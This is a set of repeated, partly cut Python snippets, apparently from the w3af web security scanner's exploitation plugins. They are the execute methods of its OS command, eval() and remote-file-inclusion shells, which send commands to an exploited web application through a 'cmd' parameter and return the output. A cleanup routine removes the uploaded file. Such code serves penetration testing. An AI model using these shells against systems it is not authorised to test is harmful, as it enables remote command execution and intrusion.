def execute(self, command): ''' This method executes a command in the remote operating system by exploiting the vulnerability. :param command: The command to handle ( ie. "ls", "whoami", etc ). :return: The result of the command. ''' to_send = self.exploit_url + command to_send = URL(to_send) response = self._uri_opener.GET(to_send) return shell_handler.extract_result(response.get_body())
def execute(self, command): """ This method is called when a user writes a command in the shell and hits enter. Before calling this method, the framework calls the generic_user_input method from the shell class. :param command: The command to handle ( ie. "read", "exec", etc ). :return: The result of the command. """ to_send = self.get_exploit_URL() to_send.querystring = u"cmd=" + command response = self._uri_opener.GET(to_send) return shell_handler.extract_result(response.get_body())
def execute(self, command): ''' This method is called when a user writes a command in the shell and hits enter. Before calling this method, the framework calls the generic_user_input method from the shell class. :param command: The command to handle ( ie. "read", "exec", etc ). :return: The result of the command. ''' to_send = self.get_exploit_URL() to_send.querystring = u'cmd=' + command response = self._uri_opener.GET(to_send) return shell_handler.extract_result(response.get_body())
:return: The result of the command. ''' e_dc = self._exploit_dc e_dc = e_dc.copy() e_dc['cmd'] = command function_reference = getattr(self._uri_opener, self.get_method()) try: http_res = function_reference(self.get_url(), str(e_dc)) except w3afException, w3: return 'Exception from the remote web application:' + str(w3) except Exception, e: return 'Unhandled exception from the remote web application:' + str( e) else: return shell_handler.extract_result(http_res.get_body()) def end(self): ''' Finish execution, clean-up, remove file. ''' om.out.debug('Remote file inclusion shell is cleaning up.') try: self._rm_file(self._exploit_dc[self.get_var()]) except Exception, e: msg = 'Remote file inclusion shell cleanup failed with exception: %s' om.out.error(msg % e) else: om.out.debug('Remote file inclusion shell cleanup complete.') def get_name(self):
super(EvalShell, self).__init__(vuln, uri_opener, worker_pool) self._shell_code = code @exec_debug def execute(self, command): ''' This method executes a command in the remote operating system by exploiting the vulnerability. :param command: The command to handle ( ie. "ls", "whoami", etc ). :return: The result of the command. ''' # Lets send the command. function_reference = getattr(self._uri_opener, self.get_method()) exploit_dc = self.get_dc() exploit_dc['cmd'] = command exploit_dc[self.get_var()] = self._shell_code try: response = function_reference(self.get_url(), str(exploit_dc)) except w3afException, w3: msg = 'An error occurred while trying to exploit the eval()'\ ' vulnerability (sending command %s). Original exception: "%s".' om.out.debug(msg % (command, w3)) return 'Unexpected error, please try again.' else: return shell_handler.extract_result(response.get_body()) def get_name(self): return 'eval_shell'
def extract_result(self, http_response): try: return shell_handler.extract_result(http_response.get_body()) except w3afException: return None
:param command: The command to handle ( ie. "read", "exec", etc ). :return: The result of the command. ''' e_dc = self._exploit_dc e_dc = e_dc.copy() e_dc['cmd'] = command function_reference = getattr(self._uri_opener, self.get_method()) try: http_res = function_reference(self.get_url(), str(e_dc)) except w3afException, w3: return 'Exception from the remote web application:' + str(w3) except Exception, e: return 'Unhandled exception from the remote web application:' + str(e) else: return shell_handler.extract_result(http_res.get_body()) def end(self): ''' Finish execution, clean-up, remove file. ''' om.out.debug('Remote file inclusion shell is cleaning up.') try: self._rm_file(self._exploit_dc[self.get_var()]) except Exception, e: msg = 'Remote file inclusion shell cleanup failed with exception: %s' om.out.error(msg % e) else: om.out.debug('Remote file inclusion shell cleanup complete.') def get_name(self):